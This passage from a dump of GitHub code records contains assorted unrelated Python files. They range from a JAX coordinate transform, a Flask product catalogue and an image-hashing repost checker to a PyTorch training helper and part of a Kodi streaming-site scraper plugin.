= jnp.std(angle)\n else:\n self.std_b1 = jnp.array(default_std['bond'])\n self.std_b2 = jnp.array(default_std['bond'])\n self.std_angle = jnp.array(default_std['angle'])\n self.scale_jac = -(jnp.log(self.std_b1) + jnp.log(self.std_b2) + jnp.log(self.std_angle))\n\n\n def forward(self, x):\n jac = jnp.zeros(x.shape[:-1])\n\n # Run transform to internal coordinates.\n x, new_jac = self.ic_transform.forward(x)\n jac = jac + new_jac\n\n # Permute to put PCAs first.\n x = x[..., self.permute]\n\n # Split off the PCA coordinates and internal coordinates\n int_coords = x[..., (3 * self.len_cart_inds):]\n\n # Compute last internal coordinates\n b1, b2, angle = self._convert_last_internal(x[..., :(3 * self.len_cart_inds)])\n jac = jac - jnp.log(b2)\n # Normalize\n b1 -= self.mean_b1\n b1 /= self.std_b1\n b2 -= self.mean_b2\n b2 /= self.std_b2\n angle -= self.mean_angle\n angle /= self.std_angle\n jac = jac + self.scale_jac\n\n # Merge everything back together.\n x = jnp.concatenate([b1[..., None], b2[..., None], angle[..., None], int_coords], axis=-1)\n\n return x, jac\n\n def inverse(self, x):\n # Create the jacobian vector\n jac = jnp.zeros(x.shape[:-1])\n\n # Separate the internal coordinates\n b1, b2, angle = x[..., 0], x[..., 1], x[..., 2]\n int_coords = x[..., (3 * self.len_cart_inds - 6):]\n\n # Reconstruct first three atoms\n b1 = b1 * self.std_b1 + self.mean_b1\n b2 = b2 * self.std_b2 + self.mean_b2\n angle = angle * self.std_angle + self.mean_angle\n jac = jac - self.scale_jac\n cart_coords = jnp.zeros(x.shape[:-1] + (3 * self.len_cart_inds,))\n cart_coords = cart_coords.at[..., 3].set(b1)\n cart_coords = cart_coords.at[..., 6].set(b2 * jnp.cos(angle))\n cart_coords = cart_coords.at[..., 7].set(b2 * jnp.sin(angle))\n jac = jac + jnp.log(b2)\n\n # Merge everything back together\n x = jnp.concatenate([cart_coords, int_coords], axis=-1)\n\n # Permute back into atom order\n x = x[..., self.permute_inv]\n\n # Run through inverse internal coordinate transform\n x, new_jac = self.ic_transform.inverse(x)\n jac = jac + new_jac\n\n return x, jac\n\n def _convert_last_internal(self, x):\n p1 = x[..., :3]\n p2 = x[..., 3:6]\n p3 = x[..., 6:9]\n p21 = p2 - p1\n p31 = p3 - p1\n b1 = jnp.linalg.norm(p21, axis=-1)\n 
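 # p21 and p31 point from atom 1 to atoms 2 and 3; the first three cartesian
 # atoms are thus encoded as two bond lengths (b1, b2) plus the angle between
 # the two vectors, which is what inverse() uses to rebuild those atoms.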
b2 = jnp.linalg.norm(p31, axis=-1)\n cos_angle = jnp.sum((p21) * (p31), axis=-1) / b1 / b2\n angle = jnp.arccos(cos_angle)\n return b1, b2, angle","repo_name":"lollcat/se3-augmented-coupling-flows","sub_path":"eacf/utils/coordinate_transform/internal.py","file_name":"internal.py","file_ext":"py","file_size_in_byte":18885,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"29276147921","text":"import os\nfrom Bio import SeqIO\nfrom LoadFile import LoadFile\n\n\ndef test_dna_reads_list(f):\n print('Checking the DNA-seq list...')\n # the file should exist\n assert os.path.isfile(f), 'DNA-seq list \"{}\" not found'.format(f)\n with LoadFile(f) as fh:\n for line in fh.readlines():\n # the two columns\n d = line.strip().split('\\t')\n assert len(d) == 2\n print(d[0])\n # the files should be paired\n r_pair_files = d[1].split(',')\n # the listed paths should exist\n assert os.path.isfile(r_pair_files[0])\n assert os.path.isfile(r_pair_files[1])\n\n return(0)\n\n\ndef test_rna_reads_list(f):\n print('Checking the RNA-seq list...')\n # the file should exist\n assert os.path.isfile(f)\n with LoadFile(f) as fh:\n for line in fh.readlines():\n # the two columns\n d = line.strip().split('\\t')\n assert len(d) == 2\n print(d[0])\n # the single read file\n r_file = d[1]\n # the listed path should exist\n assert os.path.isfile(r_file)\n return(0)\n\n\ndef test_reference_seq(f):\n print('Checking the reference sequences...')\n # the file should exist\n assert os.path.isfile(f), 'Reference genome file \"{}\" not found'.format(f)\n\n # ensure encoding method\n fh = LoadFile(f)\n\n # ensure a single sequence formatted in fasta\n seq_dict = SeqIO.to_dict(SeqIO.parse(fh, 'fasta'))\n assert len(seq_dict) == 1\n\n fh.close()\n\n return(0)\n\n\ndef test_functions(funcs_d):\n # choices\n choices_dict = {'denovo': ['Y', 'N'],\n 'snps': ['Y', 'N'],\n 'expr': ['Y', 'N'],\n 'phylo': ['Y', 'N'],\n 'de': ['Y', 'N'],\n 'ar': ['Y', 'N']}\n\n for k in funcs_d:\n # ensure the function is recognized\n assert k in choices_dict\n # ensure the choice\n assert funcs_d[k] in choices_dict[k]\n\n return(0)\n","repo_name":"hzi-bifo/seq2geno","sub_path":"main/ArgsTest.py","file_name":"ArgsTest.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4491127983","text":"\nfrom traits.api import \\\n Array, Bool, Enum, Float, HasTraits, \\\n HasStrictTraits, \\\n Instance, Int, Trait, Str, Enum, \\\n Callable, List, TraitDict, Any, Range, \\\n Delegate, Event, on_trait_change, Button, \\\n Interface, Property, cached_property, WeakRef, Dict\n\nfrom traitsui.api import \\\n Item, View, HGroup, ListEditor, VGroup, \\\n HSplit, Group, Handler, VSplit\n\nfrom traitsui.menu import \\\n NoButtons, OKButton, CancelButton, \\\n Action\n\nfrom numpy import zeros, float_\n\n\nclass ITStepperEval(Interface):\n\n \"\"\"\n Interface for time step evaluators (ITStepperEval).\n\n Each time stepper class implements the methods evaluating the\n governing equations of the simulated problem at a discrete time\n instance t.\n \"\"\"\n\n def get_state_array_size(self):\n \"\"\"\n Get the size of the state array.\n\n The state array is really an array of floating point numbers.\n Nothing else should be used to represent the physical\n object's state.\n \"\"\"\n\n def setup(self, sctx):\n '''\n Setup the state array and spatial context to be operated on.\n '''\n\n def get_corr_pred(self, sctx, u, 
tn, tn1):\n '''\n Return the corrector and predictor for supplied control variable.\n '''\n","repo_name":"simvisage/bmcs","sub_path":"ibvpy/core/i_tstepper_eval.py","file_name":"i_tstepper_eval.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70310314989","text":"#!/usr/local/bin/python3\n# check_string.py\n#\n\"\"\" Checks if an input string is upper case and ends with a period.\nNotifies if either, neither or both of these clauses are met. \"\"\"\n\ninput_str = input(\"Enter an uppercase string ending with a period: \")\n\nperiod = input_str.endswith('.')\nup = input_str.isupper()\n\nif period and up:\n print(\"Input meets both requirements.\")\nelse:\n if not period:\n print(\"Input does not end with a period.\")\n if not up:\n print(\"Input is not all upper case.\")","repo_name":"CarlosMontesTD/OST_Homework","sub_path":"python1/check_string.py","file_name":"check_string.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72467957547","text":"#!/usr/bin/env python3 \n\nimport rospy\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image as Img\nimport numpy as np\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom PIL import Image\n\ni = 0\navg = np.zeros(5)\nroot='/home/david'\n\ndef convert_depth_image(ros_image):\n bridge = CvBridge()\n global i\n depth_image = bridge.imgmsg_to_cv2(ros_image, desired_encoding=\"passthrough\")\n depth_array = np.array(depth_image, dtype=np.float32)\n im = Image.fromarray(depth_array)\n im = im.convert(\"L\")\n idx = str(i).zfill(4)\n #im.save(root+\"/depth/frame{index}.png\".format(index = idx))\n \n min_distance = 10000000\n max_distance = 0\n\n sub = depth_image[101:525,76:370]\n for x in range(sub.shape[0]):\n for y in range(sub.shape[1]):\n if sub[x, y] < min_distance:\n min_distance = sub[x, y]\n if sub[x, y] > max_distance:\n max_distance = sub[x, y]\n\n avg[i] = max_distance\n\n i += 1\n\n if i == 5:\n max_distance = avg.min()\n print(f'{min_distance} {max_distance}')\n i = 0\n if max_distance < 1100:\n print(\"Danger\")\n else:\n print(\"Clear\")\n\n \n\ndef callback(data):\n imgW = 640 * 2\n imgH = 480\n #print(rospy.get_caller_id() + \"I heard %s\", data.data)\n # imgD = np.reshape(data.data(1:2:end),imgW,imgH))\n # imgC = np.reshape(data.data(2:2:end),imgW,imgH))\n # print(len(data.data))\n # arry = np.array(data.data)\n # imgD = np.reshape(arry, (imgW, imgH))\n # print(imgD.shape)\n convert_depth_image(data)\n\n exit()\n #imgCombined = imgCx2^8 + imgD;\n \ndef listener():\n\n # In ROS, nodes are uniquely named. If two nodes with the same\n # name are launched, the previous one is kicked off. 
The\n # anonymous=True flag means that rospy will choose a unique\n # name for our 'listener' node so that multiple listeners can\n # run simultaneously.\n rospy.init_node('listener', anonymous=True)\n\n rospy.Subscriber(\"/camera/depth/image_rect_raw\", Img, callback)\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\nif __name__ == '__main__':\n print(\"Startup\")\n listener()","repo_name":"sprenkle/piece_detector","sub_path":"scripts/l515.py","file_name":"l515.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41587484367","text":"import xml.etree.ElementTree as etree\nfor i in range(11):\n tree = etree.parse('d://Keywords/news{}.xml'.format(i))\n print('\\nd://Keywords/news{}.xml'.format(i))\n root = tree.getroot()\n\n res = dict()\n for e in root.findall('.//ana'):\n word = e.attrib['lex']\n if word in res:\n res[word] += 1\n else:\n res[word] =1\n words = list(res.keys())\n for w in words:\n if res[w] <= 2:\n del res[w]\n res1 = [[w,res[w]] for w in res]\n print(res)\n \n","repo_name":"ryavorsky/MoscowPlus","sub_path":"xmlparse.py","file_name":"xmlparse.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73551629867","text":"from selenium import webdriver\r\nimport time\r\nimport streamlit as st\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\n# Replace with your chromedriver.exe path\r\ndriver = webdriver.Chrome(executable_path='C:/Users/nitro 5/Downloads/chromedriver.exe')\r\n\r\n# Website from which nifty50 price will be scraped\r\nurl = 'https://finance.yahoo.com/quote/%5ENSEI/'\r\ndriver.get(url)\r\n\r\nst.set_page_config(\r\n page_title = 'Real-Time Dashboard',\r\n page_icon = '✅',\r\n layout = 'wide'\r\n)\r\nst.title(\"Nifty50 Live Dashboard\")\r\nst.write('---')\r\n\r\nplaceholder = st.empty()\r\n\r\nwhile 1:\r\n html = driver.page_source\r\n page_soup = soup(html,features=\"lxml\")\r\n nifty50 = page_soup.find(\"div\", {\"class\": \"D(ib) Mend(20px)\"}).text\r\n my_list = nifty50.split()\r\n print(my_list)\r\n nifty50_price = my_list[0].split('+')[0]\r\n nifty50_time = my_list[3][0:5]\r\n\r\n with placeholder.container():\r\n price1, price2 = st.columns(2)\r\n price1.metric(label='Price', value=nifty50_price)\r\n price2.metric(label='Time', value=nifty50_time)\r\n\r\n time.sleep(1)\r\n","repo_name":"Hiten-98/Nifty50-Dashboard-Live-Price-Updates-with-Streamlit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1311313945","text":"from flask import Flask, render_template\nimport sqlite3\n\napp = Flask(__name__)\n\ndatabase = 'products.db'\n\n\n@app.route('/')\ndef show_categories():\n categories = []\n con = sqlite3.connect(database)\n con.row_factory = sqlite3.Row\n\n cur = con.cursor()\n cur.execute('SELECT name FROM categories')\n for row in cur:\n categories.append(row)\n\n con.close()\n\n return render_template('index.html', categories=categories)\n\n\n@app.route('/<category>')\ndef show_product_list(category):\n products_list = []\n con = sqlite3.connect(database)\n cur = con.cursor()\n category_id = (cur.execute('SELECT category_id FROM categories WHERE name = ?', [category])).fetchone()\n
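 # NB: the '/<category>' converter above is inferred from the function's
 # category parameter (the original decorator text was damaged); Flask passes
 # the path segment in as a plain string, and the parameterized query keeps it
 # out of the SQL text itself.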
 products = (cur.execute('SELECT products.name, product_id '\n 'FROM products '\n 'INNER JOIN categories on products.category = categories.category_id '\n 'WHERE products.category = ?', [category_id[0]])).fetchall()\n\n for product in products:\n product_details = {\n 'name': product[0],\n 'product_id': product[1]\n }\n products_list.append(product_details)\n\n con.close()\n\n return render_template('product_list.html', products_list=products_list)\n\n\n@app.route('/product/<_id>')\ndef show_product_details(_id):\n con = sqlite3.connect(database)\n cur = con.cursor()\n sql_query = 'SELECT products.name, in_stock, price, qty, categories.name ' \\\n 'FROM products ' \\\n 'INNER JOIN categories on products.category = categories.category_id ' \\\n 'WHERE product_id = ?'\n product = cur.execute(sql_query, [_id])\n return render_template('product_details.html', product=product)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"AnatoliyRozit/itea_python_advanced","sub_path":"08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18924635082","text":"# https://leetcode.com/problems/reverse-linked-list\n\n# Solution\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if head == None:\n return head\n \n reverseLinkedList = None\n tempNode = None\n\n while (head != None):\n # detach the current head into a temporary node\n tempNode = head\n head = head.next\n\n # push that node onto the front of the reversed list\n tempNode.next = reverseLinkedList\n reverseLinkedList = tempNode\n\n return reverseLinkedList\n","repo_name":"rupanshugoyal/leetcode","sub_path":"Python/Easy/reverse-linked-list.py","file_name":"reverse-linked-list.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21038305370","text":"from PIL import Image\nimport os\nimport imagehash\nimport distance\nimport pytesseract\nimport database\nimport numpy as np\n\n\nclass ImageProcessor:\n \"\"\"\n Image processor: perceptual-hash based duplicate detection with OCR support.\n \"\"\"\n\n def is_image(self, filename):\n \"\"\"\n Check if given filename is an image\n noinspection PyMethodMayBeStatic\n :param filename:\n :return:\n \"\"\"\n\n f = filename.lower()\n return f.endswith(\".png\") or f.endswith(\".jpg\") or \\\n f.endswith(\".jpeg\") or f.endswith(\".bmp\") or \\\n f.endswith(\".gif\") or '.jpg' in f or f.endswith(\".svg\")\n\n def create_hash(self, image):\n \"\"\"\n Create 3 hashes of the image\n noinspection PyMethodMayBeStatic\n :param image:\n :return:\n \"\"\"\n\n hash = str(imagehash.phash(image, 16))\n dhash = str(imagehash.dhash(image, 16))\n dhash_v = str(imagehash.dhash_vertical(image, 16))\n\n return [hash, dhash, dhash_v]\n\n def image_to_text(self, image):\n \"\"\"\n Use OCR to read the text on the image\n used for scanning memes\n noinspection PyMethodMayBeStatic\n :param image:\n :return:\n \"\"\"\n\n return pytesseract.image_to_string(image)\n\n def calculate_ham_dist(self, hash_str, hash_str2):\n \"\"\"\n Calculates the hamming distance of two strings\n and converts it into a similarity percentage\n noinspection PyMethodMayBeStatic\n :param hash_str:\n :param hash_str2:\n :return:\n \"\"\"\n\n dist = distance.hamming(hash_str, hash_str2)\n\n percentage = round((100 - ((64 / 100) * dist)), 2)\n\n return percentage\n\n def compare_image(self, hashes, image_hash):\n 
\"\"\"\n Function will create 3 different hashes of the given image and\n calculate the hamming distance between the given hashes the result\n will be an array of the similarity percentage of each hash\n :param hashes:\n :param image_hash:\n :return:\n \"\"\"\n\n phash_dist = self.calculate_ham_dist(hashes[0], image_hash[0])\n dhash_dist = self.calculate_ham_dist(hashes[1], image_hash[1])\n dhash_v_dist = self.calculate_ham_dist(hashes[2], image_hash[2])\n\n # Calculate total percentage of all hashes\n total_percentage = round((phash_dist + dhash_dist + dhash_v_dist) / 3)\n\n return [phash_dist, dhash_dist, dhash_v_dist, total_percentage]\n\n # noinspection PyMethodMayBeStatic\n def compare_text(self, text, text2):\n \"\"\"\n Calculate the similarity percentage between two strings using levenshtein\n :param text:\n :param text2:\n :return:\n \"\"\"\n\n if text is None:\n text = \"\"\n\n if text2 is None:\n text2 = \"\"\n\n # Get the length of the longest string\n text_len = max([len(text), len(text2)])\n # Calculate the difference between the two texts\n text_dist = distance.levenshtein(text, text2)\n # Convert the difference into a percentage\n percentage = round((100 - ((text_len / 100) * text_dist)), 2)\n\n return percentage\n\n def add_image(self, image_path, message_id):\n \"\"\"\n Generate hashes of the given image and add them to the DB\n :param image_path:\n :param message_id:\n :return:\n \"\"\"\n\n image = Image.open(image_path)\n image_hashes = self.create_hash(image)\n image_text = self.image_to_text(image)\n image_text = (''.join([c for c in image_text if c not in [' ', '\\t', '\\n']]))\n\n res = database.add_image(\n image_hashes[0],\n image_hashes[1],\n image_hashes[2],\n os.path.basename(image_path),\n message_id,\n image_text\n )\n\n return res\n\n def sort_res_array(self, x, column=None, flip=False):\n \"\"\"\n Will sort the response array based on the given column and order\n :param x:\n :param column:\n :param flip:\n :return:\n \"\"\"\n\n x = x[np.argsort(x[:, column])]\n if flip:\n x = np.flip(x, axis=0)\n return x\n\n def repost_check(self, image, total_img_perc, txt_perc):\n \"\"\"\n Function will compare all hashes in the DB with the hashes of the given image\n it will then return all images meeting the given threshold\n :param image:\n :param total_img_perc:\n :param txt_perc:\n :return:\n \"\"\"\n\n image_hashes = self.create_hash(image)\n all_images = database.get_all_images()\n\n found = []\n\n if txt_perc > 0:\n # OCR the image for any text\n image_text = self.image_to_text(image)\n # Remove any spaces, enters etc.\n image_text = (''.join([c for c in image_text if c not in [' ', '\\t', '\\n']]))\n else:\n image_text = \"\"\n\n for img in all_images:\n dist_perc_res = self.compare_image([img[0], img[1], img[2]], image_hashes)\n\n # Check if the total percentage is greater than the minimum required value\n if dist_perc_res[3] > total_img_perc:\n if txt_perc > 0:\n dist_perc_txt = self.compare_text(image_text, img[6])\n\n # Check if the text similarity percentage is greater than the set threshold\n if dist_perc_txt > txt_perc:\n return_data = img + (dist_perc_res[3], dist_perc_txt)\n found.append(return_data)\n else:\n return_data = img + (dist_perc_res[3], 0)\n found.append(return_data)\n\n if len(found) > 0:\n found_arr = np.asarray(found)\n res_array = self.sort_res_array(found_arr, column=7, flip=True).tolist()\n return res_array\n else:\n return 
False\n","repo_name":"jdaan/python-image-video-hasher","sub_path":"imageprocessor/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72085504427","text":"import logging\nimport random\nfrom psycopg2 import InternalError, IntegrityError, connect\n\nconn = connect(\"dbname=postgres user=postgres\")\ncursor = conn.cursor()\n\ncursor.execute(\"select max(user_id), min(user_id) from raw_data;\")\ncount = cursor.fetchone()\n\nif count:\n rnd_ids = ','.join([str(random.randint(count[1], count[0])) for i in range(1, 11)])\n cursor.execute(\n f\"SELECT count(user_id) FROM agg_data as AD \"\n f\"where user_id in ({rnd_ids}) group by user_id \"\n f\"having balance = (select sum(amount) from raw_data where user_id = AD.user_id group by user_id) and \"\n f\"event_number = (select count(event_id) from raw_data where user_id = AD.user_id group by user_id) and \"\n f\"best_event_id = (\"\n f\"select event_id from raw_data where user_id = AD.user_id group by event_id order by max(amount) desc limit 1\"\n f\") and \"\n f\"worst_event_id = (\"\n f\"select event_id from raw_data where user_id = AD.user_id group by event_id order by min(amount) desc limit 1\"\n f\")\"\n )\n rows = cursor.fetchall()\n\n if len(rows) != 10:\n logging.warning(\"Data is not valid.\")\n else:\n logging.warning(\"Data is valid.\")\n\ncursor.close()\nconn.close()\n","repo_name":"HaideiGV/db_aggregator","sub_path":"db_validate.py","file_name":"db_validate.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15515538998","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nFecha de creación: Tue Oct 20 17:01:06 2015\n\nCreado por: antalcides\n\"\"\"\ndef heun(f,x0,y0,h,m): \n u=[] \n v=[] \n for i in range(m): \n k1=h*f(x0,y0) \n k2=h*f(x0+h,y0+k1) \n y0=y0+0.5*(k1+k2) \n x0=x0+h \n u=u+[x0] \n v=v+[y0]\n return [u,v]\nfrom pylab import* \ndef f(x,y):\n return (y - x**2 + x + 1) \n[u,v]=heun(f,0,1,0.1,20)\ndef y(x):return exp(x) +x**2 + x #solución\nx=arange(0,2.1,0.1)\nplot(x,y(x),'--xb')\nplot(u,v,'or') \n\nlegend((r'$Anal\\'{\\i}tica$',r'$Heun$'))\ngrid(True) \nshow()\n\n","repo_name":"antalcides/migit","sub_path":"py/ode_heun.py","file_name":"ode_heun.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38803315445","text":"from calendar import month\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom constants import LINE_GROUP_LINK\n\nfrom main import aachen_an, aachen_permit\n\nsched = BlockingScheduler(timezone=\"Europe/Berlin\")\n\n# @sched.scheduled_job('interval', seconds=30)\n# def timed_job(): \n# aachen_an('2023', '01')\n# # aachen_permit()\n\n# def timed_job(year, month):\n# aachen_an(year, month)\n\ndef welcome():\n print('Welcome to use Aachen Anmeldung Termin Alert!') \n print('Note: The script only notifys appointments from Bahnhofplatz Katschhof. \\nLink: https://qtermin.de/BahnhofplatzKatschhof')\n print('=======================================================================')\n print('- Steps:')\n print('1. Join the line group in order to receive alerting messages')\n print('https://imgur.com/a8huKXY.jpg') \n print(LINE_GROUP_LINK) \n print('2. Enter the year and the month(two digits) in which you wish to have an appointment. 
For example, year:2023, month:01')\n\ndef get_input_year():\n year=None\n while True: \n year=input(\"Year:\")\n if year.isdigit() and len(str(year)) == 4: \n return year\n else:\n print(\"Enter a valid year\") \n\ndef get_input_month():\n month=None\n while True: \n month=input(\"Month:\")\n if month in {\"01\",\"02\",\"03\",\"04\",\"05\",\"06\",\"07\",\"08\",\"09\",\"10\",\"11\",\"12\"}: \n return month\n else:\n print(\"Enter 01, 02, 03, ... , 12\")\n\n\nif __name__ == \"__main__\":\n welcome()\n year,month=get_input_year(),get_input_month()\n sched.add_job(aachen_an, \"cron\", args=[year, month], second=\"*/30\")\n sched.start()","repo_name":"noworneverev/aachen-termin-alert","sub_path":"clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22077990205","text":"\"\"\"\n709. To Lower Case\n\nImplement function ToLowerCase() that has a string parameter str, and returns the same string in lowercase.\n\nExample 1:\n\nInput: \"Hello\"\nOutput: \"hello\"\n\nExample 2:\n\nInput: \"here\"\nOutput: \"here\"\n\nExample 3:\n\nInput: \"LOVELY\"\nOutput: \"lovely\"\n\"\"\"\n\n\nclass Solution:\n\n def toLowerCase(self, s: str) -> str:\n # str.lower()\n # ''.join([chr(ord(i) + 32) if i.isupper() else i for i in str])\n for i, v in enumerate(s):\n print(i, v)\n s = s[:i] + v.lower() + s[i + 1:]\n return s\n\n\nF = Solution()\nprint(F.toLowerCase('Hikari'))\n","repo_name":"homurax/leetcode","sub_path":"Algorithms/Python/easy/0709_To_Lower_Case_[Easy].py","file_name":"0709_To_Lower_Case_[Easy].py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"22668308182","text":"import numpy as np\nimport torch\nimport torch.utils.data as Data\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\n\n\ndef find_deep_params(x1):\n '''\n Returns, for each field, how many distinct values it takes, and rewrites\n train_x into a matrix of global value indices.\n :param x1: training data\n :return: the transformed train_x, the number of fields, and the number of distinct values per field\n '''\n # print(x1.shape)\n # print(x2.shape)\n x1 = np.array(x1)\n size_1, field_size = x1.shape\n # size_2, field_size = x2.shape\n X = np.zeros((size_1, field_size))\n X[:size_1] = x1\n n, field_size = X.shape\n feat_sizes = []\n # map every (field, value) pair to a global index\n dic, cnt = {}, 0\n for i in range(field_size):\n feat_sizes.append(np.unique(X[:, i]).shape[0])\n l = np.unique(X[:, i]).tolist()\n for val in l:\n # every element in each column gets its own index\n dic[i, val] = cnt\n cnt += 1\n for j in range(field_size):\n for i in range(n):\n val = X[i][j]\n X[i][j] = dic[j, val]\n return X, field_size, feat_sizes\n\n\ndef train(model, x, y, num_epoch=50, lr=3e-4, print_every=5, plot_every=5):\n '''\n Training loop.\n :param model: the model to train\n :param x:\n :param y:\n :param num_epoch:\n :param lr:\n :param print_every:\n :param plot_every:\n :return:\n '''\n cri = nn.BCELoss(reduction='sum')\n opt = torch.optim.Adam(lr=lr, params=model.parameters())\n data_set = Data.TensorDataset(x, y)\n data_loader = Data.DataLoader(dataset=data_set, batch_size=x.shape[0] // 5, shuffle=True, ) # num_workers=-1)\n losses = []\n for epoch in range(num_epoch):\n total_loss = 0\n for step, (batch_x, batch_y) in enumerate(data_loader):\n opt.zero_grad()\n outputs = model(batch_x)\n loss = cri(outputs, batch_y)\n loss.backward()\n opt.step()\n total_loss += loss.item()\n if epoch % print_every == 0:\n print('epoch:{},loss:{:.2f}'.format(epoch, total_loss / x.shape[0]))\n if epoch % plot_every == 0:\n losses.append(total_loss / x.shape[0])\n
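 # A minimal usage sketch (hypothetical names and shapes): build the index
 # matrix first, then train a binary classifier on it, e.g.
 # X, field_size, feat_sizes = find_deep_params(raw_x)
 # train(model, torch.LongTensor(X), torch.FloatTensor(labels).reshape(-1, 1))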
losses.append(total_loss / x.shape[0])\n plt.plot(losses, ls='--', color='r')\n plt.scatter(list(range(len(losses))), losses, color='b')\n plt.show()\n","repo_name":"Xiaoctw/PYTORCH","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18533326258","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------\n# streamondemand.- XBMC Plugin\n# Canale piratestreaming\n# http://www.mimediacenter.info/foro/viewforum.php?f=36\n# ------------------------------------------------------------\nimport re\nimport urlparse\n\nfrom core import config, httptools\nfrom platformcode import logger\nfrom core import scrapertools\nfrom core import servertools\nfrom core.item import Item\nfrom core.tmdb import infoSod\n\n__channel__ = \"italiaserie\"\n\nhost = \"http://www.italiaserie.co\"\n\n\ndef mainlist(item):\n logger.info(\"streamondemand.italiaserie mainlist\")\n itemlist = [Item(channel=__channel__,\n title=\"[COLOR azure]Aggiornamenti Serie TV[/COLOR]\",\n action=\"peliculas\",\n url=host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR azure]Ultimi Episodi[/COLOR]\",\n action=\"latestep\",\n url=\"%s/aggiornamento-episodi/\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR yellow]Cerca...[/COLOR]\",\n action=\"search\",\n extra=\"serie\",\n thumbnail=\"http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search\")]\n return itemlist\n\ndef newest(categoria):\n logger.info(\"[italiaserie.py]==> newest\" + categoria)\n itemlist = []\n item = Item()\n try:\n if categoria == \"series\":\n item.url = \"%s/aggiornamento-episodi/\" % host\n item.action = \"latestep\"\n itemlist = latestep(item)\n\n if itemlist[-1].action == \"latestep\":\n itemlist.pop()\n\n # Continua la ricerca in caso di errore \n except:\n import sys\n for line in sys.exc_info():\n logger.error(\"{0}\".format(line))\n return []\n\n return itemlist\n\ndef latestep(item):\n itemlist = []\n \n data = httptools.downloadpage(item.url).data\n blocco = scrapertools.find_single_match(data, r'
\\s*(.*?) 
')\n patron = r'([^<]+)\\s*\\(([^)]+)\\)'\n matches = re.compile(patron, re.DOTALL).findall(blocco)\n\n for scrapedurl, scrapedtitle, scrapedepandlang in matches:\n scrapedtitle = scrapertools.decodeHtmlentities(scrapedtitle)\n scrapedepandlang = scrapertools.decodeHtmlentities(scrapedepandlang.replace('×', 'x'))\n seasonandep = scrapertools.find_single_match(scrapedepandlang, r'(\\d+x[0-9\\-?]+)')\n lang = scrapedepandlang.replace(seasonandep, \"\").strip()\n extra = r'%s(.*?)'\n \n # Multi Ep\n if '-' in scrapedepandlang:\n season = scrapertools.find_single_match(scrapedepandlang, r'(\\d+x)')\n scrapedepandlang = scrapedepandlang.split('-')\n for ep in scrapedepandlang:\n ep = (season + ep if season not in ep else ep).replace(lang, \"\")\n completetitle = \"%s (%s %s)\" % (scrapedtitle, ep, lang)\n\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"findepvideos\",\n title=completetitle,\n contentSerieName=completetitle,\n fulltitle=scrapedtitle,\n url=scrapedurl,\n extra=\"%s (%s)\" % (extra, (ep.replace('x', '×').replace(lang, '').strip())),\n folder=True), tipo='tv'))\n continue\n \n # Ep singolo\n extra = extra % (scrapedepandlang.replace('x', '×').replace(lang, '').strip())\n completetitle = \"%s (%s)\" % (scrapedtitle, scrapedepandlang)\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"findepvideos\",\n title=completetitle,\n contentSerieName=completetitle,\n fulltitle=scrapedtitle,\n url=scrapedurl,\n extra=extra,\n folder=True), tipo='tv'))\n\n return itemlist\n\ndef 